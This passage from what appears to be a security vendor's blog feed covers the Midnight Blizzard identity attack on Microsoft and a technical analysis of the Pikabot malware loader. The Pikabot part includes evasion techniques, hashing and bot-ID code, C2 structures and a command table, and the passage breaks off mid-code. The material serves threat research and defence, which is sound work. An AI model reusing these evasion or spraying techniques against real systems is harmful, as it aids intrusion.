So, what's the carrot? What are the positive aspects to strengthening your security defenses? Sure, it starts with reducing cyberattack risk and achieving compliance, but what else? Organizations that implement robust cybersecurity practices stand to gain significantly in terms of cost reduction, competitiveness, business continuity, and customer trust. Not just one carrot, but a whole bunch!

Help is at hand. The NIS 2.0 directive itself includes clear guidance on how to improve your cybersecurity stance, and you won't be surprised to learn that the first recommended cyber hygiene practice listed is the adoption of zero trust principles. In fact, as you review these lengthy regulatory and legal requirements, zero trust comes up routinely as the holy grail to aim for.

"Users should log into applications, rather than networks"

Help is also available from Zscaler, where we've been designing and building the foundational pillars of a zero trust architecture since 2007. If you'd like to speak to someone about implementing zero trust and achieving regulatory compliance, whatever your industry, please get in touch. Alternatively, join one of our monthly introductory webinars to learn more and ask questions. Click here and search 'start here' to find the next session to sign up for.
Tue, 20 Feb 2024 00:00:02 -0800 Simon Tompson https://www.zscaler.com/blogs/company-news/nis-2-0-new-cybersecurity-rules-eu

Microsoft, Midnight Blizzard, and the Scourge of Identity Attacks https://www.zscaler.com/blogs/product-insights/microsoft-midnight-blizzard-and-scourge-identity-attacks

Summary

On January 19, 2024, technology leader Microsoft disclosed that it had fallen victim to a Russian state-sponsored cyberattack that gave the threat actors access to senior management mailboxes and resulted in sensitive data leakage. While we break down the attack step by step and explain what organizations can do to defend against similar attacks below, here's a TL;DR.

The threat actor

- Midnight Blizzard: State-sponsored Russian threat actor also known as Nobelium, CozyBear, and APT 29
- Notable Midnight Blizzard breaches: Hewlett Packard Enterprise (December 12, 2023) and SolarWinds (December 14, 2020)

The facts

- Attack target: Microsoft's Entra ID environment
- Techniques used: Password spraying, exploiting identity and SaaS misconfigurations
- Impact: Compromised Entra ID environment, unauthorized access to email accounts of Microsoft's senior leadership team, security team, legal, and more

What's unique about the attack?

- Using stealthy identity tactics that bypass existing defenses to compromise users
- Exploiting misconfigurations in SaaS applications to gain privileges
- Exploiting identity misconfigurations in Entra ID to escalate privileges

The attack sequence

1. Found a legacy, non-production test tenant in Microsoft's environment.
2. Used password spraying via residential proxies to attack the test app tenant.
3. Limited the number of attack attempts to stay under the threshold and evade blocking triggered by brute-forcing heuristics.
4. Guessed the right password and compromised the test tenant's account.
5. Generated a new secret key for the Test App that allowed the threat actor to control the app everywhere it was installed. The Test App was also present in the corporate tenant.
6. Used the app's permissions to create an admin user in the corporate tenant.
7. Used the new admin account to create malicious OAuth apps.
8. Granted the malicious app the privilege to impersonate the users of the Exchange service.
9. Used the malicious app to access Microsoft employee email accounts.

Microsoft's official guidance

- Defend against malicious OAuth applications
  - Audit privileged identities and apps in your tenant
  - Identify malicious OAuth apps
  - Implement conditional access app control for unmanaged devices
- Protect against password spray attacks
  - Eliminate insecure passwords
  - Detect, investigate, and remediate identity-based attacks
  - Enforce multi-factor authentication and password protections
  - Investigate any possible password spray activity

Zscaler's guidance

- Continuously assess SaaS applications for misconfigurations, excessive permissions, and malicious changes that open up attack paths.
- Continuously assess Active Directory and Entra ID (previously known as Azure AD) for misconfigurations, excessive permissions, and malicious changes that open up attack paths.
- Monitor users with risky permissions and misconfigurations for malicious activity like DCSync, DCShadow, Kerberoasting, etc. that is typically associated with an identity attack.
- Implement containment and response rules to block app access, isolate the user, or quarantine the endpoint when an identity attack is detected.
- Implement deception to detect password spraying, Entra ID exploitation, Active Directory exploitation, privilege escalation, and lateral movement for instances where stealthy attacks bypass existing detection and monitoring controls.

Deconstructing the attack

The threat actor

Midnight Blizzard has a long history of pulling off highly publicized breaches. It's Microsoft this time around, but in the past, they've allegedly compromised Hewlett Packard Enterprise and SolarWinds. To people who analyze attacks for a living, the Microsoft breach should not come as a surprise.
Midnight Blizzard is among a growing list of nation-state and organized threat actors that rely on identity compromise and on exploiting misconfigurations/permissions in SaaS applications and identity stores to execute breaches that conventional security thinking cannot defend against. Other threat groups using these strategies and techniques include Evil Corp, Lapsus$, BlackMatter, and Vice Society.

In the case of the Microsoft breach, the attackers demonstrated a profound understanding of OAuth mechanics and of attack techniques that evade detection controls. They created malicious applications to navigate Microsoft's corporate environment. And by manipulating the OAuth permissions, they granted themselves full access to Office 365 Exchange mailboxes, enabling them to easily exfiltrate sensitive emails.

Security challenges

- Identity-centric tactics: Midnight Blizzard strategically targeted identities, exploiting the user's credentials as a gateway to sensitive data. Conventional detection controls like EDRs are not effective against such attacks.
- OAuth application abuse: The adversaries adeptly abused OAuth applications, a technique that complicates detection and enables prolonged persistence.
- Misconfiguration blind spots: Identifying misconfigurations within Active Directory/Entra ID and SaaS environments remains a complex task, often resulting in blind spots for defenders.

Step-by-step breakdown

Pre-breach

Before the attack commenced, an admin within Microsoft's test tenant had created an OAuth app. For the purpose of this blog post, let's call this app 'TestApp.' For reasons unknown, this app was subsequently installed in Microsoft's corporate environment with elevated permissions, likely encompassing the scope Directory.ReadWrite.All, granting it the capability to create users and assign roles. Notably, this app appeared to be dormant and possibly forgotten.

ThreatLabz note: There is an unimaginable sprawl of applications, users, and associated misconfigurations and permissions that security teams often have no visibility into. More often than not, blind spots like these are what result in publicized breaches.

Initial access

In late November 2023, Midnight Blizzard initiated reconnaissance on Microsoft's SaaS environment. Discovering the test tenant, the attacker targeted its admin account, which, being a test account, had a weak, guessable password and lacked multi-factor authentication (MFA). Employing a password spraying attack, the attacker systematically attempted common passwords to gain access, leveraging residential proxies to obfuscate their origin and minimize suspicion. Eventually, the attacker successfully compromised the admin account.

ThreatLabz note: Traditional threat detection and monitoring controls are ineffective against attacks that use valid credentials, MFA-prompt bombing, and other identity-centric techniques to compromise users.

Persistence

With control over the admin account, the attacker obtained the ability to generate a new secret key for TestApp, effectively commandeering it across all installations. This tactic mirrors techniques observed in the SolarWinds attack of 2020.

ThreatLabz note: In the absence of continuous monitoring and high-confidence alerting for malicious changes made to permissions in SaaS applications, attacks like these easily cross the initial access phase of the kill chain.

Privilege escalation

Given TestApp's permissions within Microsoft's corporate tenant, the attacker created a new user, likely an administrator, to further their access. Subsequently, the attacker deployed additional malicious OAuth apps within the tenant to evade detection and ensure persistence, leveraging TestApp to grant elevated roles, such as the Exchange role EWS.full_access_as_app, facilitating mailbox access and bypassing MFA protection.
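The attack path just described (an account without MFA in one tenant that can add a secret to an app holding Directory.ReadWrite.All in another, plus a stale app carrying several secrets) can be expressed as a posture check over an application and identity inventory. The block below is an added example, not Microsoft's or Zscaler's code; the tenant, principal and app names are constructed, and the 90-day dormancy threshold is an assumption.

```python
from dataclasses import dataclass
from datetime import date

# Permissions this post names as dangerous: directory write (create users, assign roles) and
# application-level Exchange access that reaches mailboxes without any MFA prompt.
PRIVILEGED_SCOPES = {"Directory.ReadWrite.All", "EWS.full_access_as_app", "EWS.AccessAsUser.All"}
DORMANT_DAYS = 90   # assumption: a privileged app unused this long is treated as "forgotten"


@dataclass(frozen=True)
class Principal:
    name: str
    tenant: str
    mfa_enabled: bool
    directory_roles: frozenset = frozenset()   # roles held in the principal's own tenant only


@dataclass
class App:
    name: str
    owners: frozenset          # principals allowed to add a client secret to the app
    grants: dict               # tenant -> set of scopes consented to the app in that tenant
    secret_count: int
    last_used: date


def privileged_tenants(app):
    """Tenants in which the app holds at least one privileged scope."""
    return {t for t, scopes in app.grants.items() if scopes & PRIVILEGED_SCOPES}


def assess(principals, apps, today):
    """Return (finding, technique) pairs. Technique IDs follow the mapping table in this post;
    'NA' is used where the post itself maps no technique (owner path to a privileged app)."""
    by_name = {p.name: p for p in principals}
    findings = []
    for p in principals:
        if not p.mfa_enabled:
            findings.append((f"MFA disabled for {p.name} in {p.tenant}", "T1556.006"))
    for app in apps:
        priv = privileged_tenants(app)
        for owner_name in sorted(app.owners):
            owner = by_name[owner_name]
            for tenant in sorted(priv):
                # The owner is unprivileged in `tenant` if it is a different tenant (directory
                # roles do not cross tenant boundaries) or if it holds no directory role at all.
                unprivileged = tenant != owner.tenant or not owner.directory_roles
                if unprivileged or not owner.mfa_enabled:
                    scopes = sorted(app.grants[tenant] & PRIVILEGED_SCOPES)
                    findings.append((f"{owner_name} ({owner.tenant}, mfa={owner.mfa_enabled}) can add "
                                     f"a secret to {app.name}, which holds {scopes} in {tenant}", "NA"))
        if app.secret_count > 1:
            findings.append((f"{app.name} has {app.secret_count} client secrets", "T1098.001"))
        idle = (today - app.last_used).days
        if priv and idle > DORMANT_DAYS:
            findings.append((f"{app.name} is privileged but unused for {idle} days", "T1098.003"))
    return findings


def constructed_inventory():
    """Constructed inventory shaped like the narrative above; every name is hypothetical."""
    principals = [
        Principal("test-admin", "test-tenant", mfa_enabled=False,
                  directory_roles=frozenset({"Global Administrator"})),
        Principal("corp-admin", "corp-tenant", mfa_enabled=True,
                  directory_roles=frozenset({"Global Administrator"})),
        Principal("alice", "corp-tenant", mfa_enabled=True),
    ]
    apps = [
        # TestApp: owned in the test tenant, consented with directory write in the corporate tenant.
        App("TestApp", owners=frozenset({"test-admin"}),
            grants={"test-tenant": {"User.Read"}, "corp-tenant": {"Directory.ReadWrite.All"}},
            secret_count=2, last_used=date(2023, 6, 1)),
        # A well-kept privileged app: MFA-protected admin owner, single secret, recently used.
        App("MailSync", owners=frozenset({"corp-admin"}),
            grants={"corp-tenant": {"EWS.AccessAsUser.All"}},
            secret_count=1, last_used=date(2024, 1, 10)),
    ]
    return principals, apps


def run_report(today=date(2024, 1, 19)):
    """Assess the constructed inventory as of the disclosure date given in this post."""
    principals, apps = constructed_inventory()
    return assess(principals, apps, today)


if __name__ == "__main__":
    for finding, technique in run_report():
        print(f"[{technique}] {finding}")
```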
ThreatLabz note: Configuration- and permission-based blind spots extend to identities themselves. As such, it is imperative that organizations have the ability to continuously assess their Active Directory/Entra ID for misconfigurations, excessively permissive policies, and other permissions that give attackers the ability to escalate privileges from a compromised identity. They should also continuously monitor for malicious changes in the identity store that might be creating additional attack surface.

Lateral movement

Though specifics regarding the number and origin of installed apps remain unclear, the attacker's use of TestApp to confer privileges is evident. This culminated in unauthorized access to mailboxes belonging to Microsoft's senior leadership, security personnel, legal team, and other stakeholders.

How zero trust can help

A zero trust architecture provides a fundamentally secure approach that is better at protecting against the stealthy attacks used by nation-state threat actors and organized adversaries. Zero trust fundamentally eliminates weaknesses in your environment that are core properties of hub-and-spoke network models. Below is a 10,000-foot reference architecture for zero trust that explains how and why it better protects against Midnight Blizzard-style attacks.

Core zero trust capabilities

This is the heart of a zero trust architecture, consisting of Internet Access and Private Access. The Zero Trust Exchange acts as a switchboard brokering all connections between users and applications. This architecture makes your applications invisible to the Internet, thereby eliminating the external attack surface, replaces high-risk VPNs, and uses segmentation to reduce lateral threat movement and internal blast radius. To broker the connection, the Zero Trust Exchange verifies the identity, determines the destination, assesses risk, and enforces policy.

ThreatLabz note: Zscaler extends core zero trust capabilities with SaaS supply chain security, Identity Posture Management, ITDR, Deception, and Identity Credential Exposure to eliminate application and identity misconfigurations, detect stealthy attacks, and provide visibility into exposed credentials on endpoints to remove lateral movement paths. Below, we break down what each of these capabilities can do.

SaaS Security

While the move to the cloud and SaaS applications has helped organizations accelerate their digital transformation, it has also created a new set of security challenges. Among these, the lack of visibility into dangerous backdoor connections to SaaS applications is paramount, as it creates supply chain risk, the kind that was exploited in the Microsoft breach. SaaS Security strengthens your security posture by providing visibility into third-party application connections, over-privileged access, and risky permissions, along with continuous monitoring for changes that can be malicious in nature. It is a core step in securing your SaaS environment.

Identity Posture Management

Nine in ten organizations are exposed to Active Directory attacks, and there has been a 583% increase in Kerberoasting and similar identity attack techniques in 2023 alone. These are not isolated phenomena. Misconfigurations and excessive permissions in Active Directory and other identity providers are what enable these types of attacks. For example, an unprivileged account without MFA having the ability to control an application with privileged roles should be flagged, but most security teams do not have appropriate visibility into these types of misconfigurations. Identity Posture Management augments zero trust by providing security teams visibility into identity misconfigurations, policies, and permissions that open up potential attack paths. With periodic assessments, security teams can leverage remediation guidance to revoke permissions, limit policies, and remove misconfigurations.
Identity Posture Management also alerts security teams to malicious changes in Active Directory in real time.

Deception and ITDR (Identity Threat Detection and Response)

As evidenced in the Microsoft breach, attackers used password spraying from a residential proxy and limited the number of tries to evade detection. Traditional threat detection and monitoring approaches just do not work here. Deception, on the other hand, is a pragmatic approach that can detect these attacks with fairly high confidence. Decoy users created in Entra ID can detect such password spraying attacks without false positives or the need to write complex detection rules. ITDR can detect identity-specific attacks like DCSync, DCShadow, and Kerberoasting that would otherwise require detection engineering and significant triage to spot.

Identity Credential Exposure

While TTPs (Tactics, Techniques, and Procedures) were not reported for credential exploitation, credentials and other sensitive material (like usernames, passwords, authentication tokens, connection strings, etc.) on the endpoint in files, registry, and other caches are something that threat actors like Volt Typhoon, Scattered Spider, BlackBasta, BlackCat, and LockBit are known to have exploited in publicly reported breaches. Identity Credential Exposure provides security teams with visibility into credential exposure across their endpoint footprint, highlighting blind spots that open up lateral movement and data access paths from the endpoint.

Zero trust creates multiple opportunities to detect and stop Midnight Blizzard-style attacks

| Problem | Solution | How does it work? | MITRE ATT&CK Technique |
| --- | --- | --- | --- |
| Password spraying | Zscaler Deception | Decoy user accounts in Entra ID can detect any attempts to sign in using the credentials of the decoy users. Any failed/successful attempts will be logged to detect attacks like password spraying. | T1110.003 - Brute Force: Password Spraying; T1078.004 - Valid Accounts: Cloud Accounts |
| Existence of apps/SPNs with high privilege | Zscaler ITDR | ITDR can surface unprivileged accounts that have a path (e.g., owner rights) to apps with privileged roles. | NA |
| Creation of apps/SPNs with high privilege | Zscaler SaaS Security | Monitoring for and alerting when a risky app is added, an app is created by an unverified publisher, or an app hasn't been used in a while. | No technique maps to this directly; the closest approximations are T1136.003 - Create Account: Cloud Account and T1098.003 - Account Manipulation: Additional Cloud Roles |
| Creation/modification of users with high privileges | Zscaler ITDR | Monitoring of and alerting on unauthorized addition of privileged permissions to principals. | T1136.003 - Create Account: Cloud Account; T1098.003 - Account Manipulation: Additional Cloud Roles |
| Secret addition to apps | Zscaler SaaS Security | Flags applications with multiple application secrets. | T1098.001 - Account Manipulation: Additional Cloud Credentials |
| Disabled MFA | Zscaler ITDR | Finds accounts where MFA is disabled and alerts when MFA is disabled for any account. | T1556.006 - Modify Authentication Process: Multi-Factor Authentication |
| Consent grants | Zscaler SaaS Security | Monitors inclusion of high-risk scopes like EWS.full_access_as_app or EWS.AccessAsUser.All to alert on the app's risk level. | T1098.003 - Account Manipulation: Additional Cloud Roles; T1098.002 - Account Manipulation: Additional Email Delegate Permissions |

What should I do next?

Identity is the weakest link. Irrespective of whether you are running a zero trust architecture or not, start by getting visibility into identity misconfigurations and excessive permissions that can allow attackers to grant themselves privileges. We're offering a complimentary Identity Posture Assessment with Zscaler ITDR.

Gain visibility into your SaaS sprawl and find dangerous backdoor connections that can give attackers the ability to establish persistence. Request an assessment with Zscaler SaaS Security.

Implement Deception irrespective of what other threat detection measures you have. It is one of the highest-ROI threat detection controls that you can implement, augmenting controls like EDR. Zscaler Deception has a comprehensive set of decoys that can deceive and detect sophisticated attackers.

If you are a Zscaler customer, contact your account manager for support on these assessments and Deception rollout.

Tue, 13 Feb 2024 17:10:20 -0800 Amir Moin https://www.zscaler.com/blogs/product-insights/microsoft-midnight-blizzard-and-scourge-identity-attacks

The (D)Evolution of Pikabot https://www.zscaler.com/blogs/security-research/d-evolution-pikabot

Introduction

Pikabot is a malware loader that originally emerged in early 2023. Over the past year, ThreatLabz has been tracking the development of Pikabot and its modus operandi. There was a significant increase in usage of Pikabot in the second half of 2023, following the FBI-led takedown of Qakbot. This was likely the result of a BlackBasta ransomware affiliate replacing Qakbot with Pikabot for initial access. However, Pikabot ceased activity shortly after Christmas 2023, with its version number being 1.1.19 at that time. In recent campaigns, which started in February 2024, Pikabot reemerged with significant changes in its code base and structure. Although it appears to be in a new development cycle and testing phase, the developers have reduced the complexity of the code by removing advanced obfuscation techniques and changing the network communications.

Key Takeaways

- Pikabot is a malware loader that was first observed in early 2023 and became very active following the takedown of Qakbot in August 2023.
- In December 2023, Pikabot activity ceased, possibly as a result of a new version of Qakbot that emerged.
- In February 2024, a new version of Pikabot was released with significant changes.
- Previous versions of Pikabot used advanced string encryption techniques, which have been replaced with simpler algorithms.
- Pikabot now stores all configuration elements in a single memory block, similar to Qakbot. In prior versions, Pikabot decrypted necessary configuration elements only when required.
- Pikabot continues to use HTTP for command-and-control, but its network protocol has changed, including the network command IDs and the encryption algorithms.

Technical Analysis

As covered in our previous technical analysis of Pikabot, the malware consists of two components: a loader and a core module. The core module is responsible for executing commands and injecting payloads from a command-and-control server. The malware uses a code injector to decrypt and inject the core module. It employs various anti-analysis techniques and string obfuscation. Pikabot uses similar distribution methods, campaigns, and behaviors as Qakbot. The malware acts as a backdoor, allowing the attacker to control the infected system and distribute other malicious payloads such as Cobalt Strike.

In the following sections, we describe the latest Pikabot variant, including its capabilities and notable changes compared to previous versions. The analysis was performed on Pikabot binaries with version 1.8.32.

Anti-analysis techniques

As with previous versions of Pikabot, this variant employs a series of anti-analysis techniques to make analysis more time-consuming. It should be noted that none of the methods below presents any significantly advanced capability. Furthermore, Pikabot used a series of more advanced detection features in its loader component in previous versions of the malware.

Strings encryption

The most notable change is the string obfuscation.
In previous versions of Pikabot, each string was obfuscated by combining the RC4 algorithm with AES-CBC. This method was highly effective in hindering analysis, particularly automated configuration extraction. To successfully analyze Pikabot, an analyst would need to detect not only the encrypted string but also its unique RC4 key. Additionally, they would need to extract the AES key and initialization vector, which are unique to each Pikabot payload.

It should be noted that the approach the Pikabot developers followed is similar to ADVobfuscator.

In the latest version of Pikabot, the majority of the strings are either constructed by retrieving each character and pushing it onto the stack (Figure 1) or, in some rare cases, a few strings are still encrypted using the RC4 algorithm only.

Figure 1. String stack construction

Junk instructions

This anti-analysis technique was also implemented in previous versions of Pikabot. Pikabot inserts junk code between valid instructions. The junk code is either inlined in the function or a call is made to a function that contains the junk code (Figure 2).

Figure 2. Junk code

Anti-debug methods

Pikabot uses two methods to detect a debugging session:

- Reading the BeingDebugged flag from the PEB (Process Environment Block).
- Calling the Microsoft Windows API function CheckRemoteDebuggerPresent.

Pikabot constantly performs the debugging checks above in certain parts of its code, for example when it (en/de)codes network data or when it makes a request to receive a network command.

Anti-sandbox evasion

In addition to the anti-debugging checks above, Pikabot uses the following methods to evade security products and sandboxes:

- Pikabot utilizes native Windows API calls.
- Pikabot delays code execution at different stages of its code.
  The timer is randomly generated each time.
- Pikabot dynamically resolves all required Windows API functions via API hashing.

A Python representation of the algorithm is available below.

```python
def api_hash(api_name: bytes) -> int:
    """Reproduces Pikabot's API-hashing checksum for a Windows export name."""
    checksum = 0x113B
    for c in api_name:
        if c > 0x60:  # crude ASCII upper-casing: bytes above '`' lose 0x20
            c -= 0x20
        checksum = (c + (0x21 * checksum)) & 0xffffffff
    return checksum


# The export name was left blank in this write-up; pass the name you want to hash.
print(hex(api_hash(b"")))
```

Language detection

Identical to previous versions, Pikabot stops execution if the operating system's language is any of the following:

- Russian (Russia)
- Ukrainian (Ukraine)

This is likely an indication that the threat actors behind Pikabot are Russian-speaking and may reside in Ukraine and/or Russia. The language check reduces the chance of law enforcement action and potential criminal prosecution in those regions.

Bot initialization phase

Unlike previous versions, this version of Pikabot stores all settings and information in a single structure at a global address (similar to Qakbot). The analyzed structure is shown below. For brevity, we redacted non-important items of the structure (such as Windows API names).

```c
struct bot_structure {
    void *host_info;
    WINHTTPAPI winhttp_session_handle;
    bool bot_error_init_flag;
    FARPROC LdrLoadDll;
    FARPROC LdrGetProcedureAddress;
    FARPROC RtlAllocateHeap;
    FARPROC RtlReAllocateHeap;
    FARPROC RtlFreeHeap;
    FARPROC RtlDecompressBuffer;
    FARPROC RtlGetVersion;
    FARPROC RtlRandomEx;
    // ---redacted---
    wchar_t* bot_id;
    bool registered_flag;
    int process_pid;
    int process_thread_id;
    int* unknown_unused_1;
    unsigned short os_arch;
    unsigned short dlls_apis_loaded_flag;
    int unknown_unused_2;
    unsigned char* host_rc4_key;
    int number_of_swap_rounds;
    int beacon_time_ms;
    int delay_time_ms;          // Used only during the initialization phase of Pikabot.
    int delay_seed_mul;
    wchar_t* bot_version;
    wchar_t* campaign_tag;
    wchar_t* unknown_registry_key_name;
    cncs_info* active_cnc_info;
    cncs_info* cncs_list;
    int num_of_cncs;
    int unknown_unused_3;
    int max_cnc_attempts;
    wchar_t* user_agent;
    void* uris_array;
    void* request_headers_array;
    TEB* thread_environment_block;
};

struct cncs_info {
    wchar_t* cnc;
    int cnc_port;
    int http_connection_settings;   // If set to 1, the server's certificate validation is ignored and the flags
                                    // WINHTTP_FLAG_SECURE | WINHTTP_FLAG_BYPASS_PROXY_CACHE are set
    int connection_attempts;
    bool is_cnc_unavailable;
    cncs_info* next_cnc_ptr;
};
```

Bot configuration

The latest version of Pikabot stores its entire configuration in plaintext at one address. This is a significant drawback since, in previous versions, Pikabot decrypted each required element at runtime and only when required. In addition, many of the configuration elements (e.g. command-and-control URIs) were randomized.

ANALYST NOTE: Despite their randomization, all configuration elements were valid on the server side. If a bot sent incorrect information, it would get rejected/banned by the command-and-control server.

The configuration structure is the following:

```c
struct configuration {
    int number_of_swap_rounds_number_of_bytes_to_read_from_end; // During bot initialization, this member is the number of bytes to read from the end of the configuration block.
    size_t len_remaining_structure;     // Size of the remaining structure's data minus the last element
    wchar_t* bot_minor_version;         // E.g. 32-beta. In some samples, this member contains both the major and minor versions of the bot.
    size_t len_campaign_name;
    wchar_t* campaign_name;
    size_t len_unknown_registry_key_name;
    wchar_t* unknown_registry_key_name; // Used only in the network command 0x246F.
    size_t len_user_agent;
    wchar_t* user_agent;
    size_t number_of_http_headers;
    wchar_string request_headers[number_of_http_headers];
    int number_of_cnc_uris;
    wchar_string cnc_uris[number_of_cnc_uris];
    int number_of_cncs;
    cnc cncs[number_of_cncs];
    int beacon_time_ms;
    int delay_time_ms;
    int delay_seed_mul;                 // Multiplied with the calculated delay value: delay_seed_mul * 1000.
    int maximum_cnc_connection_attempts;
    size_t len_bot_version;             // major version + minor version
    wchar_t* major_version;             // 1.8.
    int len_remaining_bytes_to_read;    // Added to the first member; shows how many more bytes to read right after `len_remaining_structure`
};

struct wchar_string {
    size_t length;
    wchar_t* wstring;
};

struct cnc {
    size_t len_cnc;
    wchar_t* cnc;
    int cnc_port;
    int connection_attempts;
    bool http_connection_settings;
};
```

Once Pikabot parses the plaintext configuration, it erases it by setting all bytes to zero. We assess that this is an anti-dumping method to avoid automated extraction of the configuration.

Lastly, Pikabot loads any remaining required Windows API functions and generates a bot identifier for the compromised host.
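Because Pikabot resolves its imports by hash, an analyst working a new sample needs the reverse mapping from hash constant to export name. The block below is an added analyst helper, not part of the original ThreatLabz analysis: it rebuilds the hash table for a candidate list of export names (the ntdll exports named in the bot structure above plus a few WinHTTP/kernel32 exports; the list is an assumption, not taken from a sample) and resolves a constructed array of hash DWORDs back to names, reporting anything it cannot match.

```python
import struct

SEED = 0x113B         # initial checksum value used by the algorithm described above
MULTIPLIER = 0x21


def pikabot_api_hash(api_name: bytes) -> int:
    """The API-hashing routine above: ASCII-uppercase each byte, then
    h = (c + 0x21 * h) mod 2^32, starting from h = 0x113B."""
    checksum = SEED
    for c in api_name:
        if c > 0x60:          # crude upper-casing: bytes above '`' lose 0x20
            c -= 0x20
        checksum = (c + MULTIPLIER * checksum) & 0xFFFFFFFF
    return checksum


# Candidate export names to seed the table with (assumed list; extend it as the sample demands).
CANDIDATE_EXPORTS = [
    "LdrLoadDll", "LdrGetProcedureAddress", "RtlAllocateHeap", "RtlReAllocateHeap",
    "RtlFreeHeap", "RtlDecompressBuffer", "RtlGetVersion", "RtlRandomEx",
    "WinHttpOpen", "WinHttpConnect", "WinHttpOpenRequest", "WinHttpSendRequest",
    "GetVolumeInformationW", "CheckRemoteDebuggerPresent", "NtQueryInformationProcess",
]


def build_hash_table(names=CANDIDATE_EXPORTS) -> dict:
    """Map hash -> export name. A collision inside the candidate list would make the
    lookup ambiguous, so it is reported rather than silently overwritten."""
    table = {}
    for name in names:
        h = pikabot_api_hash(name.encode("ascii"))
        if h in table and table[h] != name:
            raise ValueError(f"collision: {table[h]} and {name} both hash to {h:#010x}")
        table[h] = name
    return table


def resolve_hash_blob(blob: bytes, table=None) -> list:
    """Resolve a little-endian DWORD array (as carved from a sample's hash list) to names.
    Unknown hashes are returned as UNKNOWN_<hex> so the analyst can grow the candidate list."""
    table = build_hash_table() if table is None else table
    if len(blob) % 4:
        raise ValueError("hash blob length must be a multiple of 4")
    values = struct.unpack(f"<{len(blob) // 4}I", blob)
    return [table.get(v, f"UNKNOWN_{v:#010x}") for v in values]


def demo() -> list:
    # Constructed blob: three hashes of known exports followed by one value not in the table.
    known = [pikabot_api_hash(n.encode()) for n in ("LdrLoadDll", "RtlAllocateHeap", "WinHttpOpen")]
    blob = struct.pack("<4I", *known, 0xDEADBEEF)
    return resolve_hash_blob(blob)


if __name__ == "__main__":
    for h, name in sorted(build_hash_table().items()):
        print(f"{h:#010x}  {name}")
    print(demo())
```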
The bot ID generation algorithm is similar to previous versions and can be reproduced with the following Python code.

```python
def checksum(value: int) -> int:
    """Linear congruential step applied repeatedly during bot ID generation."""
    return (0x10E1 * value + 0x1538) & 0xffffffff


def generate_bot_id_set_1(host_info: bytes, volume_serial_number: int) -> int:
    # Fold the lower-cased "username|hostname" string into the volume serial number.
    for current_character in host_info.lower():
        volume_serial_number *= 5
        volume_serial_number += current_character
    return checksum(volume_serial_number & 0xffffffff)


def generate_bot_id_set_2(volume_serial_number: int) -> int:
    bot_id_part_2 = checksum(volume_serial_number)
    return checksum(bot_id_part_2)


def generate_bot_id_set_3(bot_id_part_2: int) -> int:
    # Eight more checksum rounds; keep the low byte of the last four, read little-endian.
    out = []
    for _ in range(8):
        bot_id_part_2 = checksum(bot_id_part_2)
        out.append(bot_id_part_2 & 0xff)
    return int.from_bytes(bytes(out[-4:]), byteorder='little')


host_info = b"username|hostname"
# The serial number was redacted in this write-up; replace the placeholder with the host's
# volume serial number as a hex string.
volume_serial_number = int("00000000", 16)
bot_id_part_1 = generate_bot_id_set_1(host_info, volume_serial_number)
bot_id_part_2 = generate_bot_id_set_2(volume_serial_number)
bot_id_part_3 = generate_bot_id_set_3(bot_id_part_2)
bot_id = f"{bot_id_part_1:07X}{bot_id_part_2 & 0xffff:09X}{bot_id_part_3}"
print(bot_id)
```

ANALYST NOTE: In some samples, Pikabot does not read the volume serial number due to a bug in their code that causes a failure when calling GetVolumeInformationW.

Network communications

Pikabot contacts the command-and-control server to request and receive network commands. In this version, the network protocol has changed considerably. Pikabot starts by registering the compromised host with its server.
First, Pikabot collects information from the compromised host, such as:

- Monitor display settings
- Windows version
- Hostname/username and the operating system's memory size
- Beacon and delay settings
- Process information such as the process ID, parent process ID and number of threads (see the description of network command 0x985 for a comprehensive list)
- Bot version and campaign name
- Name of the domain controller

Then Pikabot appends the following information to the registration packet:

- A 32-byte network RC4 key (unique per host), which remains the same for the session. In previous versions, Pikabot used AES-CBC with a random key/IV per request.
- An unknown registry key name. We observed it used only in the network command with ID 0x246F.
- The number of swap rounds used for encoding the data. This remains the same for the rest of the session.

Next, Pikabot encrypts the data using the RC4 algorithm, encodes the encrypted output, picks a random URI from its list, and sends the data in a POST request to the command-and-control server. The encoding swaps bytes N times, where N is a randomly generated number in the range 0-25.

ANALYST NOTE: Although a round count is set in the configuration (see the configuration structure), this value is ignored and Pikabot replaces it with a random value. Moreover, Pikabot has completely removed the JSON format from its network packets and inserts everything in raw format.

If the bot registration is successful, Pikabot starts an infinite loop to request and execute commands. Each incoming network command (with the exception of the network command with ID 0x164) has a task ID that is placed at the start of the (decrypted) packet as a QWORD value. In Table 1 below, we list the identified network commands along with a description of their functionality.

Command ID | Description
0x164 | Requests a command from the command-and-control server. The packet includes the command ID, the size of the bot ID, and the bot ID. The server replies with the same command ID if there is no network command for the bot to execute.
0x555 | Reports the output of the executed network command to the command-and-control server.
0x1291 | Registers the bot. An unknown integer value (0x1687) is appended to the packet at offset 8.
0x1FED | Updates the beacon time.
0x1A5A | Terminates/kills the bot.
0x2672 | Not implemented.
0x246F | Writes a file to disk and adds registry data using the value name specified in the configuration (unknown_registry_key_name).
0xACB | Executes a system command and sends back the output. Includes the error code 0x1B3 if there is no output.
0x36C | Injects the code of a downloaded PE file. The target process information is specified in the network packet.
0x792 | Injects downloaded shellcode. The target process information is specified in the network packet.
0x359 | Executes a system command and sends back the output. Same as 0xACB but does not send the error code.
0x3A6 | Executes a system command and sends back the output. Same as 0xACB but does not send the error code.
0x240 | Executes a system command and sends back the output. Same as 0xACB but does not send the error code.
0x985 | Collects process information: the executable's filename, process ID, a Boolean flag indicating whether it is a Pikabot process, a Boolean flag indicating whether Pikabot can open the process with all possible access rights, number of threads, base priority of threads, process architecture, and parent process ID.
0x982 | Not implemented.

Table 1. Pikabot network commands

Conclusion

Despite its recent inactivity, Pikabot continues to pose a significant cyber threat and is under constant development. However, the developers have taken a different approach and reduced the complexity of Pikabot's code by removing advanced obfuscation features. Moreover, based on our code analysis, certain features and network commands have not been implemented yet and are still a work in progress.
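Referring back to the session described above (per-host 32-byte RC4 key, QWORD task ID at the start of each decrypted command, command IDs from Table 1), the following Python is an added illustration and is not part of the ThreatLabz analysis or of Pikabot's code. The RC4 routine is the standard algorithm; the session key and the packet are constructed here. The QWORD task ID is as the post describes, but the DWORD command ID placed directly after it and the body that follows are assumptions of this example, and the byte-swap encoding layer that Pikabot applies on top of RC4 is deliberately left out because the post does not document the swap operation.

```python
import struct

# Network command IDs from Table 1; 0x164 is the only packet that carries no leading task ID
PIKABOT_COMMANDS = {
    0x164: "request command",
    0x555: "report command output",
    0x1291: "register bot",
    0x1FED: "update beacon time",
    0x1A5A: "terminate bot",
    0x2672: "not implemented",
    0x246F: "write file and registry data",
    0xACB: "execute system command (error code on empty output)",
    0x36C: "inject downloaded PE",
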